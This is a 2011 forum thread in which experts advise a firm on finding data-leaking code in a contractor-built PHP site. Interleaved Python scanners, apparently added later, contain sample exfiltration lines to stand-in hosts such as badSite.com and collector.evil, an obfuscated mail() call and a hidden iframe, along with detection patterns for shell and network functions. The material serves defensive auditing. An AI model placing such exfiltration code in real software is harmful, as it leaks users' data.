Solved

Is there a way to check if there is suspicious code in a web site developed in PHP?

Posted on 2011-10-27
Last Modified: 2013-12-25
Where should we look within a web site developed in PHP to find whether there is any malicious code leaking information from our site?  Besides PHP: Java, CGI, etc.
Question by:rayluvs
15 Comments
 

Author Comment

by:rayluvs
ID: 37043116
More info.

It was a site developed for us and just turned in.  The site is more like a project & proposal site used by us.   We have doubts about one of the programmers, from a conversation we overheard.

We copied the entire site contents from our FTP to our hard drive to make the search for any hidden links or calls outside our site faster.

Basically what we want to know is what to look for in our code that would show us any connection to other sites, or how to see if our data is being sent to or received from other sites.

Hope we made our need clear.
 
LVL 36

Accepted Solution

by: Loganathan Natarajan (earned 336 total points)
ID: 37043123
There are many ways to inject suspicious code into a website; I have experienced some, like IFRAMEs, JavaScript redirects, some encrypted tags, code in between the text and HTML tags...

You can check: search for / verify whether an IFRAME is being injected anywhere in the page text/content.
 
LVL 36

Expert Comment

by:Loganathan Natarajan
ID: 37043145
Also, you may consider using some tools to scan the entire website code, so that you can find the details.

 

Author Comment

by:rayluvs
ID: 37043173
Can we make a search for keywords that would flag possible bad coding for us?  Since all the files are text, we figure that if we search for any keywords and find one, this would raise a black flag.  After we identify all keywords we'll proceed to google more info pertaining to the messages that appeared.

 
LVL 4

Assisted Solution

by:kyanwan
kyanwan earned 668 total points
ID: 37043207
With code - it will most likely require an actual audit of your code to find out if any information is leaked externally.   A simple search - will most likely not net good results, as any malicious programmer would make it hard to pattern match.  

Things to keep an eye out for -

- Code that was not requested ( Did you say PHP only?  Do you see code that does not belong?  Unrequested Javascript? )
- External / system calls - Check what is being executed.  Find out what it is.  If you cannot tell what is being executed, that's a huge red flag.
- Files & output - Look for any writing to disk.   Are files being saved to public access area or FTP accessible areas?   What kind of information is written to these files?  
- IP addresses, URIs - look for any internet addresses.  Look for decimal format IP addresses.
- Obfuscation - Do you see any areas of code that are difficult to read?  These should be scrutinized with a fine tooth comb.  

What I would strongly suggest (this is what I personally would do, if I were unfamiliar or uncomfortable with a language) is to have a completely unrelated third party audit the code.  I HIGHLY suggest to let someone who knows what they are looking for ... look for it.  This is especially vital if you are held to a high security standard - or if you are in a position to face financial loss in case of data breach.  ( such as - you're a merchant, or have private information to protect. )   The initial investment of protecting yourself - is a very smart investment.
 
LVL 84

Expert Comment

by:Dave Baldwin
ID: 37043274
I agree with @kyanwan, if you don't have the ability to write the code yourself, then you should have someone else audit it.  I know I could put things in PHP and javascript that a novice could not find.
 
LVL 111

Assisted Solution

by:Ray Paseur
Ray Paseur earned 332 total points
ID: 37044827
If you are able to get him, this fellow is one of the leading experts in PHP security and he will be able to audit the code for you.  Expect to pay $XX,000 plus expenses, but you will get the peace-of-mind that comes from an iron-clad, expert response.
http://shiflett.org/

If you cannot get Chris, you want to make a Google search for "PHP Security" and try to get someone else who is a noted author and speaker.

The point is, as kyanwan and Dave suggest, that you do not know what you do not know.  Specialized skills and knowledge are required to find the sorts of things that you must find if you want a secure system.  As the noted fire fighter Red Adair once said, "If you think it's expensive to hire a professional, just wait until you hire an amateur!"

Best of luck, ~Ray
 

Author Comment

by:rayluvs
ID: 37045538
Thank you very much for this valuable info.

Regarding contracting a professional to validate our site; it is a great recommendation.  However, the investment is not justified for us for the following reasons:

         - We are not a big firm
         - the content developed is not complex
         - not that security sensitive
         - the total size is not over 3mb
         - it is not live yet

What we're looking for is more like the details provided by kyanwan in the first part of ID: 37043207.  

We are not experts in some tech areas, but with EE assistance we have successfully done a series of tasks that we would have not been able to do before.  This site is Excellent!

We are not looking for an actual step-by-step "How-To" to detect flaws or leaks, but something like kyanwan's in the first part of ID: 3704320; guidance on where to look.

For example, when we contract a VB programmer, prior to going live with the apps developed, we look at the code for all connections, external calls to other apps or IPs to make sure that the control stays where we want.  For example the SQL connections, calls to other apps or ascii files that may input or output data for creating connections, IPs; we even look at functions to see if they create values for accessing other areas (we found once a function using char(x) until it spelled out an actual address), stuff like this.

In web, that's what we are trying to do to prior going live.

A little more info

The content is composed of (by file type):

   - Cascading Style Sheet Document (1 file)
   - Icon (16)
   - JS File (3)
   - PNG File (40)
   - JPEG image (1)
   - GIF file (1)
   - HTML Document (1)
   - PHP File (29)

Can you give us some actual names to look for, or logic flow, anything that would help us just look. It's not a big app so we are willing to invest some time.

Please advise.
 
LVL 34

Assisted Solution

by:Slick812
Slick812 earned 664 total points
ID: 37050447
greetings Ramante, in your post ID:37045538, you may not need to look at the image files (gif, jpg, png, icon) or the css (if there is malicious code in these you are in way over your head - my opinion), and you will need to look at the javascript, php and maybe the html.
First, I see as important what you will do (the action you take, as to the developer and your organization) if you find something that you think "might be" malicious code leaking information, as opposed to "definitely bad" malicious code leaking information, which may have you ask the developer what the code is doing, or just get another developer to do your site again.

There are so many ways to send info to other places, as in "malicious code leaking information"; for instance you can just connect to a remote database (mySQL, windows databases, and others) and insert your data into that database, so someone else can use your data, without your permission or knowledge.
There are several ways to connect and send/receive data in PHP and other serverside code bases, there is SOAP -
$Trans = new SoapClient("http://www.notMySite.com/steal/?ser=takeAll");

also it is possible to send data to another place just by requesting a page, and using a GET

$myData = "Secret_Valuable_Information";
$page = file_get_contents('http://www.badSite.com/?info='.$myData);

but as has been mentioned, you can mix and match code segments in PHP to "hide" or obfuscate, so that searching for text may not show you much "Malicious Code"
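Slick812's closing point, that a plain text search misses code that has been mixed and matched to hide a URL, together with rayluvs' earlier char(x) find, is the case for folding such expressions back into plain text before grepping. The following is an added example, not code from the thread or from the site under review: a small Python evaluator that undoes the common PHP string-hiding tricks (chr() chains, literal concatenation, base64_decode, strrev, str_rot13) and reports any line whose value becomes a URL or IP address on a host other than your own. The sample PHP lines, host names, variable names and function names are all constructed for this illustration.

```python
# Added example (not the site's or the posters' code): fold the PHP string-hiding
# tricks named in this thread (chr chains, base64, strrev, rot13) into plain text.
import base64
import codecs
import re
from urllib.parse import urlparse

# Constructed sample lines; hosts, paths and variable names are assumptions.
SAMPLE_PHP = r'''<?php
$ok  = "https://www.example-ourcompany.test/api";
$u   = chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).'bad'.chr(83).'ite.com/?i=';
$v   = base64_decode('aHR0cDovLzE5Mi4wLjIuMTAvZHJvcA==');
$w   = strrev('moc.etiSdab//:ptth');
$x   = str_rot13("uggc://rivy.rknzcyr/pbyyrpg");
$y   = 'http://'.strrev('tset.revres-ym').'/status';
$page = file_get_contents(base64_decode('aHR0cDovLw==') . 'collector.evil/?d=' . urlencode($data));
'''

_TOKEN = re.compile(r"""\s*(?:(?P<str>'(?:[^'\\]|\\.)*'|"(?:[^"\\]|\\.)*")
    |(?P<num>\d+)|(?P<id>[A-Za-z_]\w*)|(?P<sym>[().,])|(?P<other>\S))""", re.VERBOSE)
_ADDRESS = re.compile(r"(?:https?|ftp)://[^\s'\"]+|\b(?:\d{1,3}\.){3}\d{1,3}\b")
_FUNCS = {  # pure PHP string functions an obfuscating author leans on
    "chr": lambda a: chr(int(a[0]) % 256),
    "base64_decode": lambda a: base64.b64decode(a[0]).decode("latin-1"),
    "strrev": lambda a: a[0][::-1],
    "str_rot13": lambda a: codecs.decode(a[0], "rot_13"),
}

def _unquote_php(lit):   # strip the quotes and the backslash of \x escapes
    return re.sub(r"\\(.)", r"\1", lit[1:-1])

class _Eval:
    """Evaluates  term ('.' term)*  with term = literal | known_func(args)."""
    def __init__(self, text):
        self.toks = [(m.lastgroup, m.group(m.lastgroup)) for m in _TOKEN.finditer(text)]
        self.i = 0

    def peek(self):
        return self.toks[self.i] if self.i < len(self.toks) else (None, None)

    def expr(self, lenient=False):
        out = self.term()
        while self.peek() == ("sym", "."):
            mark = self.i
            self.i += 1
            try:
                out += self.term()
            except ValueError:
                if not lenient:
                    raise
                self.i = mark        # keep the decodable prefix and stop there
                break
        return out

    def term(self):
        kind, val = self.peek()
        self.i += 1
        if kind == "str":
            return _unquote_php(val)
        if kind == "num":
            return val
        if kind == "id" and val in _FUNCS and self.peek() == ("sym", "("):
            self.i += 1
            args = [self.expr()] if self.peek() != ("sym", ")") else []
            while self.peek() == ("sym", ","):
                self.i += 1
                args.append(self.expr())
            if self.peek() != ("sym", ")"):
                raise ValueError("unbalanced call")
            self.i += 1
            try:
                return _FUNCS[val](args)
            except (IndexError, ValueError) as exc:
                raise ValueError("bad argument to %s: %s" % (val, exc))
        raise ValueError("unsupported token %r" % (val,))

def decode_expr(text, lenient=False):
    """String the PHP expression folds to, else None.  lenient=True returns the
    longest decodable prefix of a '.' chain (e.g. up to a $variable)."""
    ev = _Eval(text)
    try:
        out = ev.expr(lenient)
    except ValueError:
        return None
    return out if lenient or ev.peek() == (None, None) else None

def _candidates(line):
    m = re.search(r"=\s*(.+);\s*$", line)             # assignment right-hand side
    if m:
        yield m.group(1)
    m = re.search(r"\b\w+\(\s*(.+)\)\s*;\s*$", line)  # outermost call's arguments
    if m:
        yield m.group(1)

def find_hidden_addresses(php_source, own_hosts=()):
    """(line_no, recovered_text) for expressions that fold to a URL or IP whose
    host is not one of own_hosts; plain string literals are covered as well."""
    hits, seen = [], set()
    for no, line in enumerate(php_source.splitlines(), 1):
        for cand in _candidates(line):
            text = decode_expr(cand, lenient=True)
            if not text or (no, text) in seen or not _ADDRESS.search(text):
                continue
            seen.add((no, text))
            if urlparse(text).hostname not in own_hosts:
                hits.append((no, text))
    return hits
```

find_hidden_addresses(open('some.php').read(), own_hosts={'www.yoursite.example'}) runs it over one file. It is deliberately lenient: a chain such as base64_decode('...') . '?d=' . urlencode($csv) still surfaces the fixed prefix, which is usually the host. Anything it cannot fold (a string assembled at runtime from database values, or through a function it does not know) still needs the human read that kyanwan recommended.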
 

Author Comment

by:rayluvs
ID: 37050756
Thanx Slick812, yes, something like that.  What we are looking for are keywords, not actual strings.  For example, we finished checking the site content files, which are in PHP, Java, CGI, etc., since they are text, for keywords such as:

   "connect"
   ip values (search for xxx.xxx.xxx)
   "MySql"
   "get"
   "select"
   "insert"
   "system("
   "passthru("
   "\"
   " exec("
 
Also just finished incorporating your keywords:

   "file_get_contents"
   "soap"

In essence we would like EE's first-hand experience of specific commands in PHP/Java/Ajax/etc. that would either save to files, open paths, save to a database, etc.

We want to compile and set up some sort of "checklist" of words to look for and then identify if they are being used correctly in our site.

What we need are examples of command words.

Thanx
 
LVL 4

Assisted Solution

by:kyanwan
kyanwan earned 668 total points
ID: 37052021
By the description of your data that you've given - I've got a feeling that your code is most likely safe.  If your data, by your own recognition, is not that valuable ... chances are the programmer will value future work from you more than some seemingly worthless information.

-------

One other thing --Do not ignore the output of your site.   A malicious coder could always take what they want, and put it secretly right out in the open to pick up later.  Try to find any blocks of code that seemingly do nothing, or modify page output in minute & inconsistent ways.  ( Read more : http://en.wikipedia.org/wiki/Covert_channel  ; in summary, look for I/O that has no value to your program in your code.   If you find it, take a second and third look at it - no matter how irrelevant it may seem. )

If you have a block of code that changes output based on variables that you consider your more "critical" information, that should be suspect & checked over.  If you can't think of a good explanation for the code - it's worth more scrutiny.

For your output, to do some quick detection that's easy & low cost - get a multi-file text editor (like editplus, or even microsoft word if you copy paste the code) - and open 10-20 different output pages from your site.   Check for inconsistencies in the generated output from page-to-page.  ( A very easy way to do this - just have your captured data all open, flip through your tabs while scrolling down bit-by-bit , with each page in the same position. )
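kyanwan's page-to-page output comparison, and Loganathan's IFRAME check in ID: 37043123, can be mechanised on the saved output pages. The following is an added example, not code from the thread or from the site under review: it parses each saved page with Python's html.parser and flags elements that load from a host other than your own, elements hidden by style or by zero size, every HTML comment (output nobody sees is where covert data tends to go), and active elements that appear on only a minority of pages. The sample pages, host names and function names are constructed.

```python
# Added example (not the site's or the posters' code): inspect saved output pages
# for off-site loads, hidden elements, comments and page-to-page oddities.
import re
from collections import Counter
from html.parser import HTMLParser
from urllib.parse import urlparse

OWN_HOSTS = {"www.example-ourcompany.test"}      # assumed: the site's own host name(s)
_HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden|opacity\s*:\s*0\b", re.I)
_ACTIVE_TAGS = {"iframe", "frame", "script", "img", "form", "object", "embed", "link"}
_URL_ATTRS = ("src", "href", "action", "data")

# Constructed sample output, as if saved with "view source" page by page.
PAGES = {
    "index.html": """<html><head><title>Projects</title><link rel="stylesheet" href="/style.css"></head>
<body><div id="main"><h1>Projects</h1><p>Welcome.</p></div>
<script src="/js/app.js"></script></body></html>""",
    "contact.html": """<html><head><title>Contact</title><link rel="stylesheet" href="/style.css"></head>
<body><div id="main"><h1>Contact</h1><form action="/contact.php" method="post"></form></div>
<script src="/js/app.js"></script></body></html>""",
    "proposal.html": """<html><head><title>Proposal 42</title><link rel="stylesheet" href="/style.css"></head>
<body><div id="main"><h1>Proposal 42</h1><p>Budget: 12000</p></div>
<!-- 6a3e cust=ACME;amt=12000 -->
<iframe src="http://collector.evil/p?id=42" width="0" height="0" style="display:none"></iframe>
<img src="http://203.0.113.9/t.gif?u=jsmith" width="1" height="1" alt="">
<script src="/js/app.js"></script></body></html>""",
}


class _Inspector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []   # (kind, detail)
        self.elements = []   # (tag, url) of active elements, for cross-page comparison

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        url = next((a[k] for k in _URL_ATTRS if a.get(k)), "")
        if tag in _ACTIVE_TAGS:
            self.elements.append((tag, url))
            host = urlparse(url).hostname
            if host and host not in OWN_HOSTS:
                self.findings.append(("off-site", "<%s> -> %s" % (tag, url)))
        tiny = a.get("width") in ("0", "1") and a.get("height") in ("0", "1")
        if tiny or "hidden" in a or _HIDDEN_STYLE.search(a.get("style") or ""):
            self.findings.append(("hidden", "<%s> %s" % (tag, url or a.get("style", ""))))

    def handle_comment(self, data):
        # Output nobody sees is a classic covert channel: review every comment.
        self.findings.append(("comment", data.strip()))


def inspect_page(html):
    """Return (findings, active_elements) for one saved page."""
    p = _Inspector()
    p.feed(html)
    p.close()
    return p.findings, p.elements


def inconsistent_elements(pages):
    """Active elements present on fewer than half the pages: what kyanwan's
    tab-flipping comparison is meant to surface.  Legitimate one-offs (a form on
    the contact page) show up too; the list is for a human to judge."""
    per_page = {name: set(inspect_page(html)[1]) for name, html in pages.items()}
    count = Counter(e for elems in per_page.values() for e in elems)
    return {e: sorted(n for n, s in per_page.items() if e in s)
            for e, c in count.items() if c < len(pages) / 2}


def audit(pages):
    """Findings per page plus the cross-page inconsistency list."""
    report = {name: inspect_page(html)[0] for name, html in pages.items()}
    report["_inconsistent"] = inconsistent_elements(pages)
    return report
```

Save each page with the browser's view-source into a directory, read them into a dict shaped like PAGES, and call audit(). The inconsistency list is a heuristic: the form that exists only on the contact page is reported beside the injected iframe, so it is meant to be read by a person, which is what kyanwan's tab-flipping amounts to.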
 

Author Comment

by:rayluvs
ID: 37053357
Thanx for the info.

Since all files that actually do processing within a site are text files, we are searching within them for names or commands that write/read to other sites.

To close the question, and besides the keywords we are searching for (see ID: 37050756), can you guys give us any additional names of commands that would do the following:

      - Write to
      - Copy To
      - Read From
      - command that would send emails

Greatly appreciated
 
LVL 34

Assisted Solution

by:Slick812
Slick812 earned 664 total points
ID: 37070481
I am posting here just to give a few ideas for PHP methods I can think of (that I remember) for network (web) transfer of data; the main two (in my mind) would be -
curl_init( )   ,   socket_create( )

some others -
ldap_connect( )   ,  ftp_connect( )   ,  ftp_ssl_connect( )

but there are so many ways to transfer over the web that I can't think of others right now; of course you could always just send an email with  mail( )

you may want to look more closely at the code places that deal with the DATA that you consider valuable and see if there are any references to web addresses or IP numbers that are not associated with your site.
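The checklist built up across this thread (kyanwan's categories in ID: 37043207, rayluvs' keyword list in ID: 37050756, the write/copy/read/email request in ID: 37053357 and Slick812's network functions just above) can be turned into one scan of the downloaded site copy. The following is an added example, not code from the thread or from the site under review: a Python keyword scan that groups PHP calls by what they can do (execute, connect, email, write, copy, read, database), flags decoding and obfuscation patterns such as chr() runs and base64 blobs, flags variable function calls like $r(...) that defeat a plain grep, and reports URLs and IP addresses that are not your own. The function-name lists are my own selection from the PHP manual and are not exhaustive; the sample files, paths and hosts are constructed.

```python
# Added example (not the site's or the posters' code): a keyword scan over PHP
# sources, grouped by what each call can do, plus obfuscation/address heuristics.
import os
import re
from urllib.parse import urlparse

OWN_HOSTS = {"www.example-ourcompany.test", "127.0.0.1"}   # assumed: your own hosts

RULES = [  # (category, regex); names from the PHP manual, list not exhaustive
    ("execute", r"\b(?:exec|system|passthru|shell_exec|popen|proc_open)\s*\(|`[^`]+`"),
    ("dynamic code", r"\b(?:eval|assert|create_function)\s*\("),
    ("network", r"\b(?:curl_init|fsockopen|pfsockopen|socket_create|stream_socket_client"
                r"|ftp_connect|ftp_ssl_connect|ldap_connect)\s*\(|\bnew\s+SoapClient\b"),
    ("email", r"\b(?:mail|mb_send_mail)\s*\("),
    ("write", r"\b(?:file_put_contents|fwrite|fputs|fputcsv|move_uploaded_file|rename|unlink)\s*\("
              r"|\bfopen\s*\([^,]+,\s*['\"][waxc]"),
    ("copy", r"\bcopy\s*\("),
    ("read", r"\b(?:file_get_contents|file|readfile|fread|fgets|fopen|parse_ini_file)\s*\("
             r"|\b(?:include|require)(?:_once)?\s*\(?\s*\$"),
    ("database", r"\b(?:mysql_connect|mysqli_connect|pg_connect|odbc_connect|new\s+(?:mysqli|PDO))\b"),
    ("decode/obfuscation", r"\b(?:base64_decode|gzinflate|gzuncompress|str_rot13|hex2bin)\s*\("
                           r"|(?:\bchr\s*\(\s*\d+\s*\)\s*\.?\s*){3,}|['\"][A-Za-z0-9+/]{40,}={0,2}['\"]"
                           r"|(?:\\x[0-9a-fA-F]{2}){4,}"),
    ("variable function", r"\$\w+\s*\("),          # $r('...') defeats a grep for mail(
    ("user input", r"\$_(?:GET|POST|REQUEST|COOKIE|SERVER)\b"),
    ("address", r"(?:https?|ftp|ftps|ssh)://[^\s'\"]+|\b(?:\d{1,3}\.){3}\d{1,3}\b"),
]
_COMPILED = [(c, re.compile(rx)) for c, rx in RULES]

SAMPLE_FILES = {  # constructed; file names, paths and hosts are assumptions
    "includes/db.php": """<?php
$db = mysqli_connect('localhost', 'app', 'secret', 'proposals');
$rows = mysqli_query($db, 'SELECT * FROM proposals');
""",
    "includes/export.php": """<?php
file_put_contents('/var/www/html/tmp/export.csv', $csv);   // saved under the web root
copy($tmp, '/var/www/html/uploads/' . $name);
mail('sales@example-ourcompany.test', 'New proposal', $body);
""",
    "includes/sync.php": """<?php
$f = $_GET['f'];
$ch = curl_init('http://203.0.113.5/sync.php');
$page = file_get_contents(base64_decode('aHR0cDovL2NvbGxlY3Rvci5ldmlsLw==') . '?d=' . urlencode($csv));
system('tar czf /tmp/site.tgz /var/www/html');
$r = 'mai' . 'l'; $r('ops@collector.evil', 's', $csv);
$x = chr(101).chr(118).chr(97).chr(108);
""",
}


def scan_source(text, filename="<string>", own_hosts=OWN_HOSTS):
    """(filename, line_no, category, matched_text) for every rule hit."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        for category, rx in _COMPILED:
            for m in rx.finditer(line):
                hit = m.group(0)
                if category == "address":
                    url = hit if "://" in hit else "//" + hit
                    if urlparse(url).hostname in own_hosts:
                        continue
                findings.append((filename, no, category, hit))
    return findings


def scan_tree(root, exts=(".php", ".inc", ".js", ".html", ".htm")):
    """Walk a downloaded site copy and scan every file with a listed extension."""
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in sorted(names):
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    findings.extend(scan_source(fh.read(), path))
    return findings


def summarize(findings):
    """Hit count per category, a first look at a long result list."""
    counts = {}
    for _, _, category, _ in findings:
        counts[category] = counts.get(category, 0) + 1
    return counts


if __name__ == "__main__":
    for name, text in SAMPLE_FILES.items():
        for _, no, category, hit in scan_source(text, name):
            print("%-20s line %d  %-20s %s" % (name, no, category, hit))
```

scan_tree('/path/to/the-ftp-download') walks the copy rayluvs pulled down and summarize() gives the category counts to start from. A hit is a place to read, not proof of wrongdoing: file_get_contents is reported under "read" whether it opens a local template or a remote URL, and mysqli_connect to localhost is as much a "database" hit as one to a foreign IP, so the argument, not the function name, decides. The sync.php sample shows why the extra heuristics matter: 'mai' . 'l' never matches a search for mail(, but the $r(...) call that follows does.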
 

Author Comment

by:rayluvs
ID: 37090917
Ok thanks all.  We think we got very valuable info from you guys.
 

Author Closing Comment

by:rayluvs
ID: 37090980
Thanx
